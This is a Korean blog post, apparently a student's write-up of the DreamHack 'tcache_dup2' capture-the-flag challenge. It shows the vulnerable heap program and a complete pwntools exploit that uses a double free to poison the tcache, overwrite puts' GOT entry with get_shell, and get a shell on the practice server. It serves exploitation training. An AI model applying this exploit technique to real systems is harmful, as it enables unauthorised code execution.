Published 2022. 5. 1. 20:24

[System Hacking] 2주차 dreamhack stage 12 - (4)

[혼자실습] Double Free Bug

Tcache_dup2

주어진 c 코드는 다음과 같다.

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

char *ptr[7];

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
}

void create_heap(int idx) {
	size_t size;

	if( idx >= 7 ) 
		exit(0);

	printf("Size: ");
	scanf("%ld", &size);

	ptr[idx] = malloc(size);

	if(!ptr[idx])
		exit(0);

	printf("Data: ");
	read(0, ptr[idx], size-1);

}

void modify_heap() {
	size_t size, idx;

	printf("idx: ");
	scanf("%ld", &idx);

	if( idx >= 7 ) 
		exit(0);

	printf("Size: ");
	scanf("%ld", &size);

	if( size > 0x10 ) 
		exit(0);

	printf("Data: ");
	read(0, ptr[idx], size);
}

void delete_heap() {
	size_t idx;

	printf("idx: ");
	scanf("%ld", &idx);
	if( idx >= 7 ) 
		exit(0);

	if( !ptr[idx] ) 
		exit(0);

	free(ptr[idx]);
}

void get_shell() {
	system("/bin/sh");
}
int main() {
	int idx;
	int i = 0;

	initialize();

	while(1) {
		printf("1. Create heap\n");
		printf("2. Modify heap\n");
		printf("3. Delete heap\n");
		printf("> ");

		scanf("%d", &idx);

		switch(idx) {
			case 1:
				create_heap(i);
				i++;
				break;
			case 2:
				modify_heap();
				break;
			case 3:
				delete_heap();
				break;
			default:
				break;
		}
	}
}

get_shell() 함수가 있는 걸 확인할 수 있고 (이를 이용해서 셸의 주소를 가져오면 될 듯하다)

delete_heap()함수에서 free를 해준 다음 초기화를 안해주었기 때문에 Double Free Bug 취약점이 발생할 것으로 보인다.

처음에 checksec를 사용해서 보호 기법을 확인해봤는데 문제에 나와있는 바와 달라서 수정해주었다

Full RELRO → Partial RELRO

Canary found → No canary found

PIE enabled → No PIE

구글링을 해보니 해당 코드는 p64() 함수로 byte형 페이로드를 만들고 이를 함수를 통해 str형으로 전송하거나 str로 바꾸고 다시 byte로 인코딩해서 전송할 경우 전송한 데이터와 다른 데이터가 찍힌다는 걸 알게되었다.

따라서

create(0x10, p64(puts_got))
create(0x10, p64(get_shell주소))

부분을

p.sendlineafter(">", "1")
p.sendlineafter(":", "16")
p.sendlineafter(":", p64(puts_got))

이와 같이 수동으로 바꿔주었다.

작성한 익스플로잇 코드는 다음과 같다.

from pwn import *

p = remote("host1.dreamhack.games", 11801)
e = ELF("./tcache_dup2")

def create(size, data):
   p.sendlineafter(">", "1")
   p.sendlineafter(":", str(size))
   p.sendlineafter(":", str(data))

def modify(idx, size, data):
   p.sendlineafter(">", "2")
   p.sendlineafter(":", str(idx))
   p.sendlineafter(":", str(size))
   p.sendafter(":", str(data))

def delete(idx):
   p.sendlineafter(">", "3")
   p.sendlineafter(":", str(idx))

puts_got = e.got["puts"]
get_shell = e.symbols["get_shell"]

create(0x10, "A"*0x8)
create(0x10, "A"*0x8)
create(0x10, "A"*0x8)

delete(0)
delete(1)
delete(2)

modify(2, 0x10, "A"*0x8 + "\x00")
delete(2)

p.sendlineafter(">", "1")
p.sendlineafter(":", "16")
p.sendlineafter(":", p64(puts_got))

create(0x10, "A"*0x8)

p.sendlineafter(">", "1")
p.sendlineafter(":", "16")
p.sendlineafter(":", p64(get_shell))

p.interactive()

실행하니 다음과 같이 플래그를 얻을 수 있었다.

'DreamHack > SystemHacking' 카테고리의 다른 글

[DreamHack System Hacking] Master Canary (1)	2022.09.19
[System Hacking] 2주차 dreamhack stage 12 - (5) (0)	2022.05.01
[System Hacking] 2주차 dreamhack stage 12 - (3) (0)	2022.04.30
[System Hacking] 2주차 dreamhack stage 12 - (2) (0)	2022.04.30
[System Hacking] 2주차 dreamhack stage 12 - (1) (0)	2022.04.08

[System Hacking] 2주차 dreamhack stage 12 - (4)

[혼자실습] Double Free Bug

Tcache_dup2

'DreamHack > SystemHacking' 카테고리의 다른 글

티스토리툴바